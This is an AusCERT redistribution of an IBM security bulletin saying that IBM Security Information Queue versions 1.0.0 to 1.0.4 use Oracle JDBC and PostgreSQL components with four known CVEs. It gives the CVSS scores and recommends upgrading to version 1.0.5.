Operating System:

[Linux]

Published:

28 January 2020

Protect yourself against future threats.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.0271
Security Bulletin: IBM Security Information Queue uses database components
         with known vulnerabilities (CVE-2016-3506, CVE-2018-1058,
                      CVE-2018-10936, CVE-2019-9193)
                              28 January 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           IBM Security Information Queue
Publisher:         IBM
Operating System:  Linux variants
Impact/Access:     Execute Arbitrary Code/Commands -- Remote/Unauthenticated
                   Administrator Compromise        -- Existing Account      
                   Denial of Service               -- Remote/Unauthenticated
                   Provide Misleading Information  -- Remote/Unauthenticated
                   Access Confidential Data        -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2019-9193 CVE-2018-10936 CVE-2018-1058
                   CVE-2016-3506  

Reference:         ASB-2018.0174
                   ASB-2018.0089

Original Bulletin: 
   https://www.ibm.com/support/pages/node/1282324

- --------------------------BEGIN INCLUDED TEXT--------------------

IBM Security Information Queue uses database components with known
vulnerabilities (CVE-2016-3506, CVE-2018-1058, CVE-2018-10936, CVE-2019-9193)

Security Bulletin

Summary

IBM Security Information Queue (ISIQ) relies on older Oracle JDBC and
PostgreSQL JAR files that have known vulnerabilities. As of v1.0.5, ISIQ
switched to newer, secure versions of the JAR files.

Vulnerability Details

CVEID: CVE-2016-3506
DESCRIPTION: Unspecified vulnerability in the JDBC component in Oracle Database
Server 11.2.0.4, 12.1.0.1, and 12.1.0.2; the Oracle Retail Xstore Point of
Service 5.5, 6.0, 6.5, 7.0, 7.1, 15.0, and 16.0; the Oracle Retail Warehouse
Management System 14.04, 14.1.3, and 15.0.1; the Oracle Retail Workforce
Management 1.60.7, and 1.64.0; the Oracle Retail Clearance Optimization Engine
13.4; the Oracle Retail Markdown Optimization 13.4 and 14.0; and Oracle Retail
Merchandising System 16.0 allows remote attackers to affect confidentiality,
integrity, and availability via unknown vectors.
CVSS Base score: 8.1
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
115131 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

CVEID: CVE-2018-1058
DESCRIPTION: A flaw was found in the way Postgresql allowed a user to modify
the behavior of a query for other users. An attacker with a user account could
use this flaw to execute code with the permissions of superuser in the
database. Versions 9.3 through 10 are affected.
CVSS Base score: 6.3
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
139844 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)

CVEID: CVE-2018-10936
DESCRIPTION: A weakness was found in postgresql-jdbc before version 42.2.5. It
was possible to provide an SSL Factory and not check the host name if a host
name verifier was not provided to the driver. This could lead to a condition
where a man-in-the-middle attacker could masquerade as a trusted server by
providing a certificate for the wrong host, as long as it was signed by a
trusted CA.
CVSS Base score: 5.9
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
149157 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N)

CVEID: CVE-2019-9193
DESCRIPTION: ** DISPUTED ** In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM
PROGRAM" function allows superusers and users in the
'pg_execute_server_program' group to execute arbitrary code in the context of
the database's operating system user. This functionality is enabled by default
and can be abused to run arbitrary operating system commands on Windows, Linux,
and macOS. NOTE: Third parties claim/state this is not an issue because
PostgreSQL functionality for COPY TO/FROM PROGRAM is acting as intended.
References state that in PostgreSQL, a superuser can execute commands as the
server user without using the COPY FROM PROGRAM.
CVSS Base score: 7.8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
159212 for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Affected Products and Versions

+-------------------------------------+---------------------------------+
|Affected Product(s)                  |Version(s)                       |
+-------------------------------------+---------------------------------+
|IBM Security Information Queue (ISIQ)|1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4|
+-------------------------------------+---------------------------------+

Remediation/Fixes

Download and install the latest IBM Security Information Queue images (tagged
at 1.0.5 or greater) from the Docker Hub repository. The instructions for
accessing and deploying the images can be found on the ISIQ starter kit page:
https://www.ibm.com/support/pages/ibm-security-information-queue-starter-kit

Workarounds and Mitigations

None

Get Notified about Future Security Bulletins

References

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBXi+PCmaOgq3Tt24GAQgnVw//XszPrrG2C3Ipt3YcY0HyJVBnaWHu2sJ/
SoQNxbuBuMTt+rQrj3xCz/p5Ec9q3pfAu3QusQnFcvi+ZvdJYUdk/uVgFi6uTVGV
W3+MeYRIuQONfxYcHM/zsqYYQG5/gM9oinuhP1aa+XlMf22wy4ebhISgN8SaaoJy
t3zpQvHJGM86YDPw1evBUWxx4RAmIVGEr3o5ZXchlWVwOIPorsNC/oBOYYDzWs5k
zwLIzENT0ciXb0AUoG8mS12gsKf5I28SvYosEcEmu2r1JPT16jnE4mp+kwyOoswq
Kc1++FXBnV+GQdGM9ah76Tpn6UVwk6wI9QJuEGC4w99grG9xnFwUo7VlXKQmPvHx
hzYMjk9qANbC0wX6Egq1d2AhRb9fAIG0JIKpx9EBvY2NHMYOEJWNtbX8pyQ1gf7Y
JGSg8TwKZYduThnW9coJ4VwGa9qxEDaQe8YDDnPFltHrvLUFImQGbxE2/fCrUbZT
6NKWRiSQD6quW2mP6/InUkrwvb6SF2we/eeK11l664UypMX2D2gN1ZNariyPNLYA
AivSMnZR6pY/2sxdCIQZbA8VVffaKSfoWdI5ydinCTxoXRYsXX7zygkXRY4SSFFA
89CrJdtfmrrjCYv7Iqc+3/o2JTOaAM0cxtEdPQUzcymsFEmL2Z4CZuGNUyIWkpci
XN64ALGB2xg=
=yUqK
-----END PGP SIGNATURE-----